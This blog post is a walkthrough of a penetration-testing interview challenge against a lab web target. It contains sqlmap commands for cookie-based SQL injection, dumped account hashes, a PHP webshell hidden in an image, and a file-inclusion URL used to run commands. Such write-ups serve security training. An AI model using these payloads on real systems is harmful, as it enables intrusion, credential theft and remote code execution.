banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

Record a practical question from a certain company's interview

Friend interview, sent a practical question, found the same question on the public network, record it here.

Open the question link as follows:

Untitled

Click on the about page for some hints.

Untitled

It says that directory scanning is required, and dirsearch is used for directory scanning, and some files are discovered.

Untitled

Access robots.txt to see if there is any sensitive information.

Untitled

It hints at /1234, but accessing it shows 404.

Untitled

This website has changed robots.txt, and through the robots.txt file of the friend's interview target machine, it is known that the content is Company_admin/login.php, which is the backend of this website.

Untitled

The backend requires email, password, and a four-digit authentication code. Through simple brute-forcing, it is discovered that the captcha on this page changes every time it is refreshed, so the method of form brute-forcing is not feasible.

In the about.php page of the interview target machine, there is also a hint of sqli, SQL injection, and obviously there is a SQL injection vulnerability on the page.

Click on the blog on the homepage and find that there is a parameter for id, try if there is SQL injection.

Untitled

Here is a hint, "about my password".

Directly use sqlmap for injection exploitation, and find that direct exploitation cannot retrieve content.

Through testing, it is found that the injection point exists in the cookie.

Untitled

3 and 4.

Untitled

Run directly with sqlmap.

sqlmap -u "http://47.114.90.165:21001/single.php" --cookie "id=6" --level 2 -v 3 -D hs_test_s1_blog --tables

Untitled

There are five tables.

Read table content:

sqlmap -u "http://47.114.90.165:21001/single.php" --cookie "id=6" --level 2 -v 3 -D hs_test_s1_blog -T admin –columns

Untitled

When sqlmap runs the fields of amdin, it keeps reporting errors, so manual injection is used here.

Untitled

Obtain five accounts:

2020-08-08 20:16:55:fakeaddr@gmail.com:e69dc2c09e8da6259422d987ccbe95b5
2021-10-19 01:44:56:123@qq.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 02:53:01:qwe@gmail.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 23:41:40:qian@gmail.com:e10adc3949ba59abbe56e057f20f883e

The plaintext of [email protected] is asdqwe123.

Untitled

Now only the four-digit authentication code is left. Since brute-forcing is not possible, there is a hint on the about page, which mentions "some social engineering".

In the blog section of the interview target machine, there are two articles, one of which is about wishing oneself a happy birthday, with a birthday date, 2019-10-27.

Untitled

Try entering it, and login successfully with 1027.

The interface after logging in is as follows:

Untitled

In the Blog-create post section, there is an upload point, and after testing, it is found that this place has a whitelist, which restricts only uploading image format extensions.

Untitled

See if there is a file inclusion vulnerability, directly include a webshell in the image, and then execute commands.

In the access-language section, there is a parameter that is very familiar, "?template=".

Untitled

Direct file inclusion is possible, so prepare an image shell.

Untitled

Create a PHP file and a PNG file.

cat 1.php >> 1.png

After testing, it is found that the webshell uploaded by this target machine cannot be connected through GET or POST requests. It can only be connected through the cookie parameter, just like SQL injection, and then execute commands.

First, prepare the following webshell file.

<?php system($_COOKIE['a']);?>

Then make an image shell using the method above, and the generated image is as shown in the figure below.

Untitled

Go back to the place where you create a blog and upload the image shell.

Untitled

The address is upload/0c3459ff68c1495cefc557f0084a2ac6.png.

File inclusion: http://47.114.90.165:21001/Company_admin/language.php?template=../../upload/0c3459ff68c1495cefc557f0084a2ac6.png.

Untitled

Capture this packet with Burp, and then execute commands in the cookie section.

Untitled

Start looking for the flag.

Untitled

Successfully found the flag.

Untitled

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.